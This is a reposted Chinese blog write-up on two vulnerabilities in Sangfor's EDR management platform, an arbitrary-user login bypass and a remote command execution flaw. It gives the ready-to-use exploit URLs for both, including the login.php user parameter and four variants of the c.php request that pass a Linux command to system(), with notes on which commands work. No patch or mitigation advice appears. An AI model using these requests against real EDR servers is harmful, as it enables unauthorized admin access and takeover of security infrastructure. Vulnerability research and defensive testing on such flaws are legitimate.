深信服EDR任意用户登录与命令执行漏洞

没有人挡得住,你疯狂的努力进取。你可以不够强大,但你不能没有梦想。如果你没有梦想,你只能为别人的梦想打工筑路。

导读:本篇文章讲解 深信服EDR任意用户登录与命令执行漏洞,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

1.深信服EDR简介

  终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
  EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
  端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。

2.深信服EDR漏洞

2.1.后台任意用户登录漏洞

2.1.1.漏洞描述

  攻击者利用该漏洞,登录任意用户。

2.1.2.影响版本

  EDR <= v3.2.19

2.1.3.漏洞复现

构建URL:https://IP地址/ui/login.php?user=admin

  注意后面的admin是必须存在的用户,也就是说EDR设备上必须存在admin的用户,这样才能直接登录admin,若访问的是一个不存在的用户,那么必然无法登录。
在这里插入图片描述

2.2.任意命令执行漏洞

2.2.1.漏洞描述

  攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。

2.2.2.影响版本

  EDR v3.2.16
  EDR v3.2.17
  EDR v3.2.19

2.2.3.漏洞复现

  注意这里的话,其实有很多的命令是不能用的,而文件上传后,也会存在无法连接的情况,这个还是需要注意一点。

2.2.3.1.构建URL

  这里的url都是构建出来的,后面的id就是命令,根据不同的命令进行执行,注意使用的是Linux命令。

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&path=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&row=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&limit=id

2.2.3.2.效果

  查询当前路径
在这里插入图片描述

  查看当前目录下文件

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133417.html

(1)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!